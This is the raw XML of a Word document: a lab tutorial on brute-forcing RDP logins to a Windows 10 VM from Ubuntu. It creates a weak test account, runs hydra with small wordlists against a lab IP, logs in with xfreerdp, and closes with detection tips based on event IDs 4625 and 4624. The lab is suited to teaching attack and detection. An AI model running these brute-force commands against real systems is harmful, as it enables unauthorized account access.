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B56" w:rsidRPr="00DE4B56" w:rsidRDefault="00DE4B56" w:rsidP="00080F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theme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE4B56">
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Lateral Movement via RDP Brute Force</w:t>
      </w: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Scenario: Ubuntu (Attacker) → Windows 10 (Target) via RDP brute force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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DE4B56" w:rsidRPr="00DE4B56">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Simulate</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE4B56">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> how an attacker in Ubuntu (Kali/Ubuntu-based) attempts to brute-force RDP login into a Windows machine using username and password combinations.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Tools Needed (On Ubuntu):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="869"/>
        <w:gridCol w:w="3399"/>
      </w:tblGrid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Tool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Purpose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hydra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Brute-force tool for services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Target Machine: Windows 10</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2795"/>
        <w:gridCol w:w="5288"/>
      </w:tblGrid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Requirement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jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:bCs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bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Configuration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RDP Enabled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✅</w:t>
            </w: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Control Panel &gt; System &gt; Remote Desktop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Username &amp; Password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Create a test user (e.g., testuser / 123456)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Firewall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✅</w:t>
            </w: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Allow RDP (port 3389)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Network Type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✅</w:t>
            </w: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 xml:space="preserve"> Host-Only or Bridged</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00080F74" w:rsidRPr="00DE4B56" w:rsidTr="00DE4B56"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IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00080F74" w:rsidRPr="00DE4B56" w:rsidRDefault="00080F74" w:rsidP="00080F74">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE4B56">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>e.g., 192.168.129.132</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Step-by-Step Instructions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 xml:space="preserve"> Step 1: Set Up Windows 10 (Target)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00080F74" w:rsidRPr="00DE4B56" w:rsidRDefault="00080F74" w:rsidP="00080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Enable RDP</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE4B56">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00080F74" w:rsidRPr="00DE4B56" w:rsidRDefault="00080F74" w:rsidP="00080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Start &gt; Settings &gt; System &gt; Remote Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00080F74" w:rsidRPr="00DE4B56" w:rsidRDefault="00080F74" w:rsidP="00080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 xml:space="preserve">Turn </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE4B56">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Enable Remote Desktop"</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE4B56">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ON</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00080F74" w:rsidRPr="00DE4B56" w:rsidRDefault="00080F74" w:rsidP="00080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Allow RDP through Firewall</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE4B56">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00080F74" w:rsidRPr="00DE4B56" w:rsidRDefault="00080F74" w:rsidP="00080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Search Windows Defender Firewall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00080F74" w:rsidRPr="00DE4B56" w:rsidRDefault="00080F74" w:rsidP="00080F7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Allow app through firewall &gt; enable for Remote Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00080F74" w:rsidRPr="00DE4B56" w:rsidRDefault="00080F74" w:rsidP="00080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Create Low-Privileged User</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE4B56">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00080F74" w:rsidRPr="00DE4B56" w:rsidRDefault="00080F74" w:rsidP="00080F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net user testuser 123456 /add</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00080F74" w:rsidRPr="00DE4B56" w:rsidRDefault="00080F74" w:rsidP="00080F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net localgroup "Remote Desktop Users" testuser /add</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00080F74" w:rsidRPr="00DE4B56" w:rsidRDefault="00080F74" w:rsidP="00080F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Note the IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE4B56">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00080F74" w:rsidRPr="00DE4B56" w:rsidRDefault="00080F74" w:rsidP="00080F7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ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00080F74" w:rsidRPr="00DE4B56" w:rsidRDefault="00080F74" w:rsidP="00080F7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lastRenderedPageBreak/>
        <w:t>Example: 192.168.129.132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Step 2: Set Up Ubuntu (Attacker)</w:t>
      </w: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 xml:space="preserve"> Ensure network connectivity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ping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192.168.129.132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Step 3: Install Hydra on Ubuntu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apt update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apt install hydra -y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 xml:space="preserve"> Step 4: Create Wordlists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Create a password list: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-e "123\n123456\npassword\n12345678" &gt; pass.txt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Create a username list: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echo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"testuser" &gt; user.txt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Step 5: Brute-Force RDP with Hydra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hydra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-L user.txt -P pass.txt rdp://192.168.129.132</w:t>
      </w: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Output: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[3389][</w:t>
      </w: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rdp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>] host: 192.168.129.132   login: testuser   password: 123456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Successful Login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Once credentials are correct, you can:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00080F74" w:rsidRPr="00DE4B56" w:rsidRDefault="00080F74" w:rsidP="00080F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Use remmina (GUI RDP client on Ubuntu) to RDP into Windows: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t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DE4B56">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> apt install remmina -y</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00080F74" w:rsidRPr="00DE4B56" w:rsidRDefault="00080F74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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DE4B56">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>remmina</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00080F74" w:rsidRPr="00DE4B56" w:rsidRDefault="00080F74" w:rsidP="00080F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Use xfreerdp (CLI):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00080F74" w:rsidRPr="00DE4B56" w:rsidRDefault="00DE4B56" w:rsidP="00080F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Xfreerdp</w:t>
      </w:r>
      <w:r w:rsidR="00080F74" w:rsidRPr="00DE4B56">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> /u</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00080F74" w:rsidRPr="00DE4B56">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:testuser</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00080F74" w:rsidRPr="00DE4B56">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> /p:123456 /v:192.168.129.132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:rsidR="00080F74" w:rsidRPr="00DE4B56" w:rsidRDefault="00080F74" w:rsidP="00080F74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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE4B56">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Detection (If Using SIEM / Wazuh / ELK)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On Windows, brute-force RDP triggers:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00080F74" w:rsidRPr="00DE4B56" w:rsidRDefault="00080F74" w:rsidP="00080F74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You can build ELK/Wazuh rules to alert when:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00080F74" w:rsidRPr="00DE4B56" w:rsidRDefault="00080F74" w:rsidP="00080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Multiple 4625 from same IP in short time</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00080F74" w:rsidRPr="00DE4B56" w:rsidRDefault="00080F74" w:rsidP="00080F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en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE4B56">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4624 follows many 4625s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00080F74" w:rsidRPr="00DE4B56" w:rsidRDefault="00080F74" w:rsidP="00080F74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sectPr w:rsidR="00080F74" w:rsidRPr="00DE4B56" w:rsidSect="00E1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01903"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5E14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D578E5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7A98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2D175D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DDB6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CA0460"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="30E67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80F74"/>
    <w:rsid w:val="00080F74"/>
    <w:rsid w:val="002E2946"/>
    <w:rsid w:val="005E3F23"/>
    <w:rsid w:val="00DE4B56"/>
    <w:rsid w:val="00E103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3A9"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00080F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80F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080F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0F7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80F7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080F7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080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080F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80F7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0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0F74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DE4B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4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289</Words>
  <Characters>1649</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>13</Lines>
  <Paragraphs>3</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>HP</Company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AARTI RAJYAGURU</dc:creator>
  <cp:lastModifiedBy>AARTI RAJYAGURU</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-06-13T18:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-14T04:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>